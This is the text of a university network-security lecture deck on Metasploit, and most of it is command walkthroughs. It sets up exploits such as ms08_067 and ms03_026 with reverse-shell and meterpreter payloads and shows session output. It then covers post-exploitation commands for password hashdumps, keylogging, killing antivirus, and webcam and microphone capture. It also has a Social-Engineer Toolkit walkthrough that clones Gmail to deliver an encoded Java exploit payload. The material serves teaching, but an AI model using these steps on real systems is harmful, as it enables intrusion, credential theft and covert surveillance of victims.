1
Network Security
Metasploit
Osman SALEM
Maître de Conférences
Exploitation
Using any unauthorized tools will get you fired/arrested/deported/smited by God, etc...
This course is not intended to make you a cracker
Just a small hacker to understant the importance of patches
You are the only responsible for misuse of these tools
2
2
Exploitation
Once on a network, how to find vulnerability ?
Vulnerability scanner tools
How to get access ?
System penetration through vulnerability exploitation
Target weak servers first to test boxes
Less likely to be patched
Get access to:
Steal passwords
Set up relays
etc.
So, what is Metasploit Framework?
what it is capable of providing ?
3
Many Attack Vectors!
Gaining access to a secured system is a difficult task requires skill and may be … luck
However, the most dangerous and very effective attacks used by malicious users today are Software exploitation attacks!
Social engineering
Software Exploitation Attacks can be used to gain access to unauthorized systems:
Installation of malicious software (Spyware, Virus’s, Trojans, Adware, etc.)
4
3
Understanding S.E. Attacks.
First, let’s understand basics
“The word vulnerability, in computer security, refers to a weakness in a
system allowing an attacker to violate the confidentiality, integrity,
availability, access control, consistency or audit mechanisms of the system
or the data and applications it hosts”
To Software Developers, a bug is synonymous to a vulnerability
Ex: Errors in program’s source code or flawed program design
Buffer overflows
Memory leaks
Dead locks
Arithmetic overflow
Accessing protected memory (Access Violation)
etc.
5
Exploitation – Exploits
Regardless the type of software bug we are speaking of
Triggers an unexpected condition in program
generating an event that the program is not designed to recover successfully
Redirect execution in a controlled way to run the payload
The payload is a sequence of code that is executed when the vulnerability is triggered
To make things clear, an Exploit is really broken up into two parts:
EXPLOIT = Vulnerability + Payload
6
4
Understanding Payloads
The payload is usually written in Assembly Language
Platform and OS dependant A Win32 payload will not work in Linux (even if we are exploiting the
same bug)
Different payload types exist and they accomplish different tasks exec Execute a command or program on the remote system download_exec Download a file from a URL and execute upload_exec Upload a local file and execute adduser Add user to system accounts
The most common payload Unix /bin/sh Win command prompt cmd.exe
Two different types of shell payloads Bind Shells and reverse Shells
7
Auxialiaries & encoders
Auxialiaries: Scanning, sniffing, fingerprinting, etc.
Encoders Evades detection by antivirus, firefwall, IDS, IPS, etc.
Encodes the payload during penetration operation
8
5
Metasploit Framework
What is the Metasploit Framework? “The Metasploit Framework is a platform for writing, testing, and using
exploit code.”
Provides simplified method for launching dangerous attacks
Set of exploits to launch against a box
Potentially own the box
Build a real exploit for your own purposes
General interface for testing & writing exploit
Will not make you a cracker
9
MSFConsole
Most efficient, powerful, and all-in-one centralized frontend interfaces
For penetration testers to use metasploit
$ cd /pentest/exploits/framework/
$ ./msfconsole
$ msf > help
$ show exploits
$ show payloads
$ show encoders
$ show -h
10
6
MSFConsole
$ ./msfconsole
$ msf > use exploit/windows/smb/ms08_067_netapi
$ msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit [*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.0.7
[*] Command shell session 1 opened (192.168.0.3:41289 ->
192.168.0.7:4444) at Sat Nov 13 19:01:23 +0000 2010
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
11
MSFConsole
12
7
13
Exploitation – Metasploit
Metasploit:
getting a shell
Exploitation – Metasploit
14
8
15
Exploitation – Meterpreter
Take many actions
Upload/download files
Read/write to registry
Change file access times
Execute programs
Exploitation – Exploits
Modern exploits work best
ms08-067 – October 2008 (1/3 machines still vuln)
ms03-026 – September 2003
Used by MS Blaster
ms04-011 – April 2004
Used by Sasser
16
9
MSFConsole
$ ./msfconsole
$ msf > use exploit/windows/smb/ms08_067_netapi
$ msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) show options
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3 LHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > exploit …
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Essayer le payload: set PAYLOAD windows/vncinject/reverse_tcp
set RHOST & set LHOST
17
MSFConsole
$ ./msfconsole
$ msf > use exploit/windows/dcerpc/ms03_026_dcom
$ msf exploit(ms03_026_dcom) > show options
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms03_026_dcom) > set LHOST 192.168.1.10
msf exploit(ms03_026_dcom) > set RHOST 192.168.1.17
msf exploit(ms03_026_dcom) > exploit
18
10
MSFConsole
$ ./msfconsole
$ msf > use exploit/windows/browser/ms10_046_icon_dllloader
$ msf exploit(ms10_046_icon_dllloader) > show options
msf exploit(ms10_046_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_046_icon_dllloader) > set LHOST 192.168.1.10
msf exploit(ms08_067_netapi) > exploit
In browser of victime, enter the IP address of the attacker
19
MSFConsole
msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > show payloads
msf exploit(ms10_061_spoolss) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_061_spoolss) > set LHOST [MY IP ADDRESS]
msf exploit(ms10_061_spoolss) > set RHOST [TARGET IP]
msf exploit(ms10_061_spoolss) > exploit
20
11
Information gathering
nslookup www.mi.parisdescartes.fr
nslookup
set type=mx
mi.parisdescartes.fr
whois –h whois.ripe.net 193.48.xx.YY
Netcraft: http://searchdns.netcraft.com
nmap –sS –Pn 192.168.1.18
nmap –sS –Pn –A 192.168.1.18
TCP idle scan
msf > use auxiliary/scanner/ip/ipidseq msf auxiliary(ipidseq) > show options
msf auxiliary(ipidseq) > set RHOSTS 192.168.1.0/24
msf auxiliary(ipidseq) > set THREADS 50
msf auxiliary(ipidseq) > run
msf auxiliary(ipidseq) > nmap -PN -sI 192.168.1.109 192.168.1.155
21
Exploitation – Meterpreter
Meterpreter
A Metasploit payload
Injects itself into target process as a .dll
To cover your tracks
22
12
MSFConsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > show payloads
...
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
...
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > exploit [*] Meterpreter session 1 opened (192.168.0.3:4444 ->
192.168.0.7:1029)
meterpreter > help
meterpreter > getuid
meterpreter > sysinfo 23
MSFConsole
meterpreter > run hashdump
meterpreter > ps
meterpreter > migrate 3172
meterpreter > getpid
meterpreter > getuid
meterpreter > use_priv (to enable keystroke, you must load priv extension)
meterpreter > keyscan_start //(keystroke)
meterpreter > keyscan_dump
meterpreter > keyscan_stop
meterpreter > screenshot
meterpreter > shell
meterpreter > run vnc
meterpreter > run killav (to kill the antivirus)
24
13
25
Exploitation – Meterpreter
Acts as ordinary payload
SET : Social-Engineer Toolkit
14
SET uses Metasploit
There is a "social engineering" aspect in most hacking
Tricking a user into making a mistake, that lets you in
Clicking a link
Ignoring an error message
Opening an attachment
etc.
Today's Attack
Target: Win 7
Vuln: Java 0-Day
Evil Web Server
Target
Using
Gmail
Attacker:
Evil Web
Server with
Cloned
Gmail Page Java Exploit
Code Added to
Web Page
15
Social Engineering
http://www.secmaniac.com/blog/2011/01/01/bypass-windows-uac/
Commands
cd /pentest/exploits/SET ./set Enter option 1: Social Engineering Attacks Enter option 2: Website Attack Vectors Enter option 1: The Java Attack Method Enter option 2: Site Cloner Enter url https://gmail.com It asks you "What payload do you want to generate:" and lists 11 choices
Press Enter for default: 2. (Windows Reverse_TCP Meterpreter)
It shows a list of 16 encodings to try and bypass AV. Press Enter for default
It asks you to "Enter the PORT of the listener (enter for default): Press Enter for default
It asks you whether you want to create a Linux.OSX reverse_tcp payload. Enter no
It now shows blue text saying: [*] Launching MSF Listener... [*] This may take a few to load MSF...
Wait... When it's done, you will see a whole screen scroll by as Metasploit launches, ending with this message: msf exploit(handler) >
16
Commands
GAME OVER
The target is now owned. We can
Capture screenshots
Capture keystrokes
Turn on the microphone and listen
Turn on the webcam and take photo
Steal password hashes
etc.
17
Fun & Games
To remotely control the target: sessions -i 1
Commands to try: screenshot
keyscan_start
keyscan_stop
record_mic 10
webcam_list
webcam_snap 1
The Usual Stuff
This stuff is all helpful
Get Antivirus
Install patches (when they exist)
Keep image-based backups so you can recover after an infection
But none of it can really save you
18
Attack > Defense
Even corporate desktop computers are infected
The Chinese got into Google and >30 other huge companies last year
Don't imagine you are immune